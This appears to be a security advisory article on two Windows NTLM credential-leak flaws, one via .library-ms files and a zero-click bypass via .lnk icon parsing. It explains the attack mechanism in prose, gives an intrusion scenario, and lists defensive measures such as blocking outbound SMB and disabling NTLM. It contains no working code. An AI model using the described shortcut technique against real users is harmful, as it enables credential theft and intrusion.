0‑Click NTLM Credential Leak: When a Patched Windows Flaw Came Back More Dangerous

In March 2025, Microsoft addressed CVE‑2025‑24054, an NTLM hash disclosure via .library‑ms. In August 2025, researchers disclosed a zero‑click bypass, CVE‑2025‑50154, that silently leaks credentials through .lnk icon parsing — even on fully patched systems.

Overview

CVE‑2025‑24054 abused Windows Explorer handling of .library‑ms files to coerce SMB authentication to attacker‑controlled servers, exposing NTLMv2 hashes. The patch reduced several remote path abuse vectors, but it did not neutralize the broader class of issues tied to automatic resource resolution inside Explorer. In August 2025, CVE‑2025‑50154 showed that carefully crafted .lnk shortcuts can still trigger remote fetches and NTLM authentication without any user interaction. The net effect is a reliable credential‑leak primitive with nearly zero behavioral indicators at point of initial compromise.

How it works

The original vector relies on the XML definition in .library‑ms. When a user opens, previews, or in some cases merely interacts with an archive containing such a file, Explorer attempts to enumerate library locations. If a location references a UNC path like \\server\share, Windows initiates SMB negotiation and presents NTLM credentials. Adversaries distributed booby‑trapped archives via malspam and legitimate file‑sharing services, mixing in .url, .website, and .lnk files to increase reliability across environments.

The bypass pivots to .lnk icon extraction. A shortcut’s TargetPath points to a remote SMB share hosting a benign‑looking executable. The icon resource is referenced locally (e.g., shell32.dll), which avoids the patched checks that focus on UNC icon paths. Despite the local icon reference, Explorer still downloads the remote executable in the background to parse embedded RT_ICON data for rendering. That network request includes NTLM authentication to the attacker’s server. The crucial detail is that the leak occurs when Explorer renders directory contents; opening a folder with the malicious shortcut is enough to transmit the hash.

Risks

Captured NTLMv2 hashes enable offline cracking; weak, reused, or non‑random passwords are recoverable at practical cost. Even when cracking is infeasible, adversaries can perform NTLM relay to internal services that still accept NTLM, allowing lateral movement without plaintext credentials. The bypass adds a stealth delivery angle: the executable fetched during icon parsing can remain dormant and later be activated by a secondary technique, creating a two‑stage intrusion that bypasses many delivery‑time controls and user awareness safeguards.

Real‑life example

A defense contractor receives a ZIP archive with project resources and several disguised .lnk files. The analyst does not open any file but browses the folder to triage contents. Explorer renders shortcut icons, reaches out to a remote SMB share controlled by the adversary, and sends NTLMv2 hashes. Hours later, a cracked, reused password grants VPN or SharePoint access. Meanwhile, the background icon parse has already placed a harmless‑looking binary on the endpoint. A follow‑up lure, macro, or persistence mechanism invokes it, providing an encrypted reverse shell. The initial steps blend into normal Explorer behavior, so endpoint controls may not flag the sequence until post‑compromise activity becomes visible.

Recommendations

Apply Microsoft’s March 2025 update for CVE‑2025‑24054 and track the release that fully addresses CVE‑2025‑50154. Disable NTLM where possible; otherwise enforce NTLMv2 with SMB signing and restrict outbound SMB (TCP 445; NetBIOS 137–139) to the internet. Introduce allowlists for internal SMB and monitor for unexpected outbound authentications. Add SIEM detections for Explorer‑initiated SMB requests to untrusted hosts and unusual shortcut processing in user directories. Block or quarantine .library‑ms and untrusted .lnk from email and web downloads, and prefer sandboxed extraction paths. Periodically hunt for suspicious shortcuts and unexplained executables sourced from UNC paths. User training remains helpful, but zero‑click vectors demand protocol hardening and traffic controls.